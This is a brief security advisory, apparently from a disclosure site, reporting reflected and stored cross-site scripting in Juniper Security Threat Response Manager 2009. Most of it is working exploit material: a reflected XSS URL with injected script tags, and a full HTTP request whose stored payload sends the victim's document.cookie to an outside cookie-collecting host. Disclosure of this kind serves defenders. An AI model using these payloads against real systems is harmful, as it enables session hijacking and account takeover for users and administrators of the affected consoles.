|
Brought to you by:
Suppliers of:
|
|
|
| |
| An attacker can run XSS and Stored XSS attacks on Juniper Security Threat Response Manager users and admin. |
| |
Credit:
The information has been provided by Nir Goldshlager.
|
| |
Vulnerable Systems:
* Juniper Security Threat Response Manager version 2009 build 128806
Regular XSS (NEED TO BE LOGGED IN):
https://strm.acmegizmo.com/console/do/core/genericsearchlist?appName=Reports&pageId=GeneratedReportList&groupId=10086&orderBy=CreationDate"><script>alert(4)</script>"><script>alert('XSS')</script>&columnSorting=t
Stored XSS (NEED TO BE LOGGED IN):
GET /console/config/sentry/sentry_proc.cgi?process=sentry&return=sentry&sentrypermissions=demo%2C&type=1&viewconf=staging%2Fglobalconfig&autoUpdate=0&qrl=network%3Dall%3BnetworkSelect%3Dall%3Bdisplay%3Dapps_server%3Bfunction%3Dnormal%3Bds%3Din%3Blayer%3Dbytes%3BgraphType%3Dstack%3BgraphSize%3D100%3Bremove%3Dapps_server-InverseIsKnown%3Bdirection%3Dall%3BdisplaySelect%3DMisc%2CDataTransfer%2CDataWarehousing%2CMail%2CRemoteAccess%2CKnown_to_client_or_server%2CNo_Detect_Attempt%2CP2P%2CInnerSystem%2CStreaming%2Cother%2CWeb%2CContentDelivery%2CLegacy%2CNetworkManagement%2CRoutingProtocols%2CSecurityProtocol%2CGames%2CFilePrint%2CInternetProtocol%2CClientServer%2CDirectoryServices%2CMultimedia%2CHealthcare%2CUncommonProtocol%2CSkype%2CVDOPhone%2C%3Bstart%3D1254040360%3Bend%3D1254070420&returnId=back&id=941677688&sentryname="></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://nirgold.tripod.com/cgi-bin/cookie/cookie.cgi?sid="%2bdocument.cookie)>&sentrydescription=vvv&quiettime=0&alertdelay=0&maxalerts=0&enabled=true&weight=50&primaryaddress=destination&userSelect=demo&packageid=95&var_%24%24Counter=in&emailsubject=&emailaddress=&emailformat=text&triggerscript=Trap&triggerarguments= HTTP/1.1
Host: strm.acmegizmo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://strm.acmegizmo.com/console/config/sentry/sentry_edit.cgi?viewconf=staging/globalconfig&returnid=back&id=941677688
Cookie: JSESSIONID=4843F363CFE4D91285736FA455EC38DB; SEC=2d3bb74b-590d-46ea-bf2f-fb0fdb1a1e70
|
|
blog comments powered by
|
|
|